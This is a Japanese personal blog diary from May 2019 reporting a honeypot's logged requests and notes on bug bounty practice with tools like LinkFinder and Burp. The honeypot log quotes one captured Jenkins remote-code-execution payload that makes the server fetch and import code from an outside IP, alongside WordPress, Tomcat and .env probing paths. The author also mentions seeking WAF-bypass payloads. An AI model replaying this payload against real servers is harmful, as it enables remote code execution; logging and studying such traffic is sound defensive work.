【バグバウンティ】 2019年5月29日 活動日記【ハニーポット】

f:id:NickShadows:20190529225223j:plain:w600

※hackerone経由で公式にwebの調査をしています。

ハニーポット

トップ画面

f:id:NickShadows:20190529224525p:plain:w600


直近1ヶ月折れ線グラフ

f:id:NickShadows:20190529224547p:plain:w600


GETリクエスト
no uri Co
1 / 67
2 *1 7
3 /downloader/ 2
4 /TP/public/index.php 1
5 ///?author=1 1
6 /wp-json/wp/v2/users/ 1
7 /wp-login.php 1
8 ///wp-json/wp/v2/users/ 1
9 /sitemap.xml 1
10 /.well-known/security.txt 1
11 /favicon.ico 1
12 /robots.txt 1
13 /MAPI/API 1
14 /manager/html 1

*1

 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;


POSTリクエスト

アクセスなし


pypmyadminユーザー

アクセスなし


pypmyadminパスワード

アクセスなし


wordpressユーザー

アクセスなし


wordpressパスワード

アクセスなし


tomcatユーザー
no user Co
1 1


tomcatパスワード
no pwd Co
1 1


直近24時間新着アクセス
no uri request_body
1 /MAPI/API
2 /wordpress9/wp-login.php
3 /wordpress8/wp-login.php
4 /myblog/wp-login.php
5 /downloader/
6 /azenv.php?auth=155913765309941&a=PC&i=873348332&p=8080 testPost=true
7 /Temporary_Listen_Addresses/SMSSERVICE
8 /forum1/wp-login.php
9 /siteblog/wp-login.php
10 /test/wp-login.php
11 /wordpress7/wp-login.php
12 /app/.env


まとめ

wordpressのアクセスが少しありましたってくらいです。

バグバウンティ

やろうとしたこと
  1. 実践:jsを解読する
やったこと
  1. 実践:jsを解読する

1.実践:jsを解読する

案の定、ツールの使い方を忘れました。
現時点で自分のブログを1番有効活用しているのは自分だと胸を張って言えます(まとめてよかった)


jsファイルがたくさんあるときにLinkFinderをどう使うか、ですね。
JSParser使えよって話なんですが、SSLなんちゃらでエラーが出てしまって使えず。。。
休みの日か何かに調べます。


Burpもproの機能を使いたいですね。
購入したんですが、決済が遅れて使えず。


ブログにまとめた通りペイロードを実行しましたが、WAFか何かに阻まれて403エラー。
WAF回避版も調べてペイロードに追加しようと思います。

次やりたいこと

気になったニュースなど

追えませんでした。。。